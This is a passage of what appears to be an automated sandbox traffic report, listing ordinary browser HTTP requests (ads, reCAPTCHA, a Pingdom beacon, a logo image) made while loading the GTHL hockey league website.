Source: global trafficHTTP traffic detected: GET /getconfig/sodar?sv=200&tid=gpt&tv=m202501070101&st=env HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gthlcanada.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGVEItcfYX5VnBJqAaxOYU0XpUiah4PU5Q6CWkzb4Zowfh1F-PARr8lQ-MmOpjV65wQAcuLfiwOgDkOiwQmlX_Y; NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /img/beacon.gif?id=5ae71569e970f89d2593f739&sAW=1920&sAH=1040&bIW=1920&bIH=953&pD=24&dPR=1&or=landscape-primary&nT=0&rC=0&nS=0&cS=170&cE=700&dLE=170&dLS=170&fS=7&hS=171&rE=-1&rS=-1&reS=700&resS=906&resE=1111&uEE=-1&uES=-1&dL=909&dI=5463&dCLES=5463&dCLEE=5464&dC=10399&lES=10399&lEE=10531&s=nt&title=GTHL%20%E2%80%93%20Official%20Site%20of%20the%20GTHL&path=https%3A%2F%2Fgthlcanada.com%2F&ref=&sId=eawsq55k&sST=1736802081&sIS=1&rV=0&v=1.4.1 HTTP/1.1Host: rum-collector-2.pingdom.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gthlcanada.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/gthl_logo_thumb-1.png HTTP/1.1Host: gthl.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gampad/ads?pvsid=4461304755155343&correlator=709494525036105&eid=31088846%2C31085776%2C83321073%2C31086810%2C95340253%2C95340255&output=ldjh&gdfp_req=1&vrg=202501070101&ptt=17&impl=fifs&iu_parts=128473736%2CGTHL_Leaderboard&enc_prev_ius=%2F0%2F1&prev_iu_szs=970x250%7C970x90%7C728x90&ifi=2&sfv=1-0-40&sc=1&cookie_enabled=1&abxe=1&dt=1736802081720&lmt=1736802081&adxs=467&adys=276&biw=1903&bih=953&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1080&u_w=1920&u_ah=1040&u_aw=1920&u_cd=24&u_sd=1&u_tz=-300&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&url=https%3A%2F%2Fgthlcanada.com%2F&vis=1&psz=970x0&msz=970x0&fws=0&ohw=0&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtudWxsLG51bGwsbnVsbCwiZGVwcmVjYXRlZF9rYW5vbiJdLG51bGwsM10.&dlt=1736802072109&idt=5963&prev_scp=lang%3Deng&adks=3145876704&frm=20&eoidce=1&td=1&egid=48566&tan=ac9f98fe-8a22-4c45-9038-325d4fc698ee&tdf=2 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /gampad/ads?pvsid=4461304755155343&correlator=709494525036105&eid=31088846%2C31085776%2C83321073%2C31086810%2C95340253%2C95340255&output=ldjh&gdfp_req=1&vrg=202501070101&ptt=17&impl=fifs&iu_parts=128473736%2CGTHL_BigBox_1&enc_prev_ius=%2F0%2F1&prev_iu_szs=300x600%7C300x250&ifi=1&sfv=1-0-40&sc=1&cookie_enabled=1&abxe=1&dt=1736802081707&lmt=1736802081&adxs=1239&adys=469&biw=1903&bih=953&scr_x=0&scr_y=0&btvi=0&ucis=1&oid=2&u_his=1&u_h=1080&u_w=1920&u_ah=1040&u_aw=1920&u_cd=24&u_sd=1&u_tz=-300&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&url=https%3A%2F%2Fgthlcanada.com%2F&vis=1&psz=300x0&msz=300x0&fws=0&ohw=0&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtudWxsLG51bGwsbnVsbCwiZGVwcmVjYXRlZF9rYW5vbiJdLG51bGwsM10.&dlt=1736802072109&idt=5963&prev_scp=lang%3Deng&adks=739091630&frm=20&eoidce=1&td=1&egid=48566&tan=ac9f98fe-8a22-4c45-9038-325d4fc698ed&tdf=2 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsu44-NW2lkWqO94iuv2Uu_fmIslyj4itC84H85KgUkrQuEUXA02rqDeH_j34PDJO2LZQM3gxeTzi5w_a5BS6bue_XNJSWmXHS_WLHXB1hvCVpN7K1TSPefqy2CR4LnseshjLkU2fQelh1qihrIBVQurTBcwLIEafnGBHWuFEy4JinZy8L__xzA1E5_919AxE2dxsWgUePAnj02gX9q4LjQdxjb2i9OiWsVVdZec1XKdGuumPKx63GEHjjL-5cVXeQFnGGEcIOXnsZad0FjIP-Sel_bwmgArb7TTHKvmIglT73FQWpfdERZ2dY8ZzlkUsuC-8iqkbfrjiNqBzoRdGLFKKoMDnXexSk7sHhfGC5Y1T7gqGxDZskV_5WUpzkfVAaVoX0trNdc&sai=AMfl-YSAUS1Gzr9I3iEKfZrezbkOI7yoq1mIP_O0iJGKtcEun36XY3keea_Dux32pbFy1yABxvFbOcmBt7IQjGo0-JCw7nBDBU47kHQrkooHPFTsORZmgnfRT6ttgWo0IE2JuHeN_XFt57TBQVZt4JY-&sig=Cg0ArKJSzHP-3NwCphJcEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsvF5S-GdTlwOxtqRiddlIneGyoYcjemeY3Vr-T4NB95ULZ_SuQ0YZjRHhm33hbbwtgM4klwm5KWxjBujeTUN9WKjmn_DCg1egSHYfz-jn8_Lk62qOWUZBzbAKWIowK8bt9c5pnehdp9-1JJPk9VCF9ktAsyVbTxwAaHpBOLRa_Xs01ZjJGJpfooIuV1qF25keRHj-kEqqP67qbUsZhMC-WOoKJHRoFs6MzMLTeEIrxkXNo2JyAXIIqaV3dH3TSq8l3XHe5iQ2DmE3AGwQx9JimjOTOf1KViM8QS9qX5w3P0JnQULicmj30xhArsF--oZuRUt1fXfbpPO8uJDVQ_oUEfpxhwuyuZd__wH4I7whSvlA4eOi1fvydG78sURA3PqfrJOFY&sai=AMfl-YQ5zT3AYXgv_7jED2C0FisfvBOlKe1EsGA0KL-VYpljc2GVUh2HL-xbk20slA_qYqqYNEgmiBkDzsb6g6qfYkPfSo23iaHR4LQR3hKpGpeDydJ5esBX4mBugzwkHQPyBkGibr0-cZWBM0W-FE0NjQ&sig=Cg0ArKJSzESgVpPYvjXOEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsu44-NW2lkWqO94iuv2Uu_fmIslyj4itC84H85KgUkrQuEUXA02rqDeH_j34PDJO2LZQM3gxeTzi5w_a5BS6bue_XNJSWmXHS_WLHXB1hvCVpN7K1TSPefqy2CR4LnseshjLkU2fQelh1qihrIBVQurTBcwLIEafnGBHWuFEy4JinZy8L__xzA1E5_919AxE2dxsWgUePAnj02gX9q4LjQdxjb2i9OiWsVVdZec1XKdGuumPKx63GEHjjL-5cVXeQFnGGEcIOXnsZad0FjIP-Sel_bwmgArb7TTHKvmIglT73FQWpfdERZ2dY8ZzlkUsuC-8iqkbfrjiNqBzoRdGLFKKoMDnXexSk7sHhfGC5Y1T7gqGxDZskV_5WUpzkfVAaVoX0trNdc&sai=AMfl-YSAUS1Gzr9I3iEKfZrezbkOI7yoq1mIP_O0iJGKtcEun36XY3keea_Dux32pbFy1yABxvFbOcmBt7IQjGo0-JCw7nBDBU47kHQrkooHPFTsORZmgnfRT6ttgWo0IE2JuHeN_XFt57TBQVZt4JY-&sig=Cg0ArKJSzHP-3NwCphJcEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUl6AcFnooOgX67A4-e6DUNsWyzZ17A7jLOLNMzXlp1YE5rfAFihtHAPAXG0xgk
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsvF5S-GdTlwOxtqRiddlIneGyoYcjemeY3Vr-T4NB95ULZ_SuQ0YZjRHhm33hbbwtgM4klwm5KWxjBujeTUN9WKjmn_DCg1egSHYfz-jn8_Lk62qOWUZBzbAKWIowK8bt9c5pnehdp9-1JJPk9VCF9ktAsyVbTxwAaHpBOLRa_Xs01ZjJGJpfooIuV1qF25keRHj-kEqqP67qbUsZhMC-WOoKJHRoFs6MzMLTeEIrxkXNo2JyAXIIqaV3dH3TSq8l3XHe5iQ2DmE3AGwQx9JimjOTOf1KViM8QS9qX5w3P0JnQULicmj30xhArsF--oZuRUt1fXfbpPO8uJDVQ_oUEfpxhwuyuZd__wH4I7whSvlA4eOi1fvydG78sURA3PqfrJOFY&sai=AMfl-YQ5zT3AYXgv_7jED2C0FisfvBOlKe1EsGA0KL-VYpljc2GVUh2HL-xbk20slA_qYqqYNEgmiBkDzsb6g6qfYkPfSo23iaHR4LQR3hKpGpeDydJ5esBX4mBugzwkHQPyBkGibr0-cZWBM0W-FE0NjQ&sig=Cg0ArKJSzESgVpPYvjXOEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmFMexZyPF8ekSPY7mab-7EqxWdKNI6twOQtH5InOJlLetdtPCyXaQn-4_WdOY
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/aframe HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGVEItcfYX5VnBJqAaxOYU0XpUiah4PU5Q6CWkzb4Zowfh1F-PARr8lQ-MmOpjV65wQAcuLfiwOgDkOiwQmlX_Y; NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /img/beacon.gif?id=5ae71569e970f89d2593f739&sAW=1920&sAH=1040&bIW=1920&bIH=953&pD=24&dPR=1&or=landscape-primary&nT=0&rC=0&nS=0&cS=170&cE=700&dLE=170&dLS=170&fS=7&hS=171&rE=-1&rS=-1&reS=700&resS=906&resE=1111&uEE=-1&uES=-1&dL=909&dI=5463&dCLES=5463&dCLEE=5464&dC=10399&lES=10399&lEE=10531&s=nt&title=GTHL%20%E2%80%93%20Official%20Site%20of%20the%20GTHL&path=https%3A%2F%2Fgthlcanada.com%2F&ref=&sId=eawsq55k&sST=1736802081&sIS=1&rV=0&v=1.4.1 HTTP/1.1Host: rum-collector-2.pingdom.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/js/car.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUWkdlKllMqviDxxxLVP8C9uCD9LaFtqiAgO3BTprl3-ajcC9WPRa4RcPWAH8
Source: global trafficHTTP traffic detected: GET /sodar/sodar2/232/runner.html HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sodar/sodar2.js HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsumxo8ubsb_JN_P84oG_65VDFHnMlwXALd00ITDTfsvwecLdTuIS_A3xIuuAgrYlGWMj7Hn0oFamwwtoUmQcyCN7D2rq0emZUgaiDVMuJHXNuvx-kUM4-ybnPRDjDLPbyoKVMOJVqwwvjNPXuk6q9OcUnKx-9vJUTDkqDrnoXax-4RQHxaemZQDnPJvsE99kumH3kwmz7tc-vYNtwRNBLqtzRg84LDzSrK26JxeKB8LLBc36Hc_-RtWdOQ2Le7dlOpTiym-h2O31motHl8ap8JUc8XFQ5tEzIwkS8T78kkDNZ9E57o0wQKq61W1nxz7fFyfPZnMfoFGcEFOed-S3Q_VVerldaRIun-_O3wR3CJL7RcFsVmamgNly4m9-soCF3D7-qnTlg&sai=AMfl-YQOExIpCw4GllDMcTdfYiraFOs-EZuInERO7BS2yD5FEfHig_kIBwVhe92qpOw_p1FTBOK7UZSz_UnXSmAZ4bYman9eKa3AOe6sJoI3yL2OZfatB62CoVYPlG7-kRKGsRGE8pfwQMEV3GNJkxCgqg&sig=Cg0ArKJSzNhjn_2BU4OsEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjssN1nD6VE02J921_qHTqoNAvxR_3INnuojIXTFgdZTnWGsxkXkVjQx5qTBdR-Y4YI2MotzFuLf-xndZlB5XZCnKcdeO3YUwBdqPrfzEHXFDFocOETpgOy08CX9AbFR4McNv6_EIFIMkUGlDW2A7RLTKBOyaCTqFG4DEuHbE4pwk0YMx2ImsUoFietb0f1CwfxKnDiTpDglSvyHQJqD8RrSEMeGpo8Kxz-KIguhfBXhVHwK_8DMF4ttsX7bO4vHXxkD1oqPat5vfA9h3DUEsynJMIuO0g-QzkQ91r5iSIU3L8Qa3Ovbm-QsgXLUge2LgRExk73o4iZ1_-gNrO3kUBFolb3uL0h0DyaEuXofhoTXuIOKrgnUFQfpZ2pzkq6dIaVtpRvAWbvcPTw&sai=AMfl-YS4S1WsgtQz9g59wBwQ2rBNEBnBRZ6dvcHaxnTxdBuxZ6Vr3I28xNVNxkKvzsq5E42khim_ToqVYY9gd3P44eH0-eH6RFK3t3rGIsE7Ett__voShup6zgHcApxLVB5zBh6PYYm6MBODY_BbenzE&sig=Cg0ArKJSzKvr2y-hEhnYEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjsumxo8ubsb_JN_P84oG_65VDFHnMlwXALd00ITDTfsvwecLdTuIS_A3xIuuAgrYlGWMj7Hn0oFamwwtoUmQcyCN7D2rq0emZUgaiDVMuJHXNuvx-kUM4-ybnPRDjDLPbyoKVMOJVqwwvjNPXuk6q9OcUnKx-9vJUTDkqDrnoXax-4RQHxaemZQDnPJvsE99kumH3kwmz7tc-vYNtwRNBLqtzRg84LDzSrK26JxeKB8LLBc36Hc_-RtWdOQ2Le7dlOpTiym-h2O31motHl8ap8JUc8XFQ5tEzIwkS8T78kkDNZ9E57o0wQKq61W1nxz7fFyfPZnMfoFGcEFOed-S3Q_VVerldaRIun-_O3wR3CJL7RcFsVmamgNly4m9-soCF3D7-qnTlg&sai=AMfl-YQOExIpCw4GllDMcTdfYiraFOs-EZuInERO7BS2yD5FEfHig_kIBwVhe92qpOw_p1FTBOK7UZSz_UnXSmAZ4bYman9eKa3AOe6sJoI3yL2OZfatB62CoVYPlG7-kRKGsRGE8pfwQMEV3GNJkxCgqg&sig=Cg0ArKJSzNhjn_2BU4OsEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUWkdlKllMqviDxxxLVP8C9uCD9LaFtqiAgO3BTprl3-ajcC9WPRa4RcPWAH8
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjssN1nD6VE02J921_qHTqoNAvxR_3INnuojIXTFgdZTnWGsxkXkVjQx5qTBdR-Y4YI2MotzFuLf-xndZlB5XZCnKcdeO3YUwBdqPrfzEHXFDFocOETpgOy08CX9AbFR4McNv6_EIFIMkUGlDW2A7RLTKBOyaCTqFG4DEuHbE4pwk0YMx2ImsUoFietb0f1CwfxKnDiTpDglSvyHQJqD8RrSEMeGpo8Kxz-KIguhfBXhVHwK_8DMF4ttsX7bO4vHXxkD1oqPat5vfA9h3DUEsynJMIuO0g-QzkQ91r5iSIU3L8Qa3Ovbm-QsgXLUge2LgRExk73o4iZ1_-gNrO3kUBFolb3uL0h0DyaEuXofhoTXuIOKrgnUFQfpZ2pzkq6dIaVtpRvAWbvcPTw&sai=AMfl-YS4S1WsgtQz9g59wBwQ2rBNEBnBRZ6dvcHaxnTxdBuxZ6Vr3I28xNVNxkKvzsq5E42khim_ToqVYY9gd3P44eH0-eH6RFK3t3rGIsE7Ett__voShup6zgHcApxLVB5zBh6PYYm6MBODY_BbenzE&sig=Cg0ArKJSzKvr2y-hEhnYEAE&uach_m=%5BUACH%5D&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUWkdlKllMqviDxxxLVP8C9uCD9LaFtqiAgO3BTprl3-ajcC9WPRa4RcPWAH8
Source: global trafficHTTP traffic detected: GET /generate_204?EDmzGQ HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ep2.adtrafficquality.google/sodar/sodar2/232/runner.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET 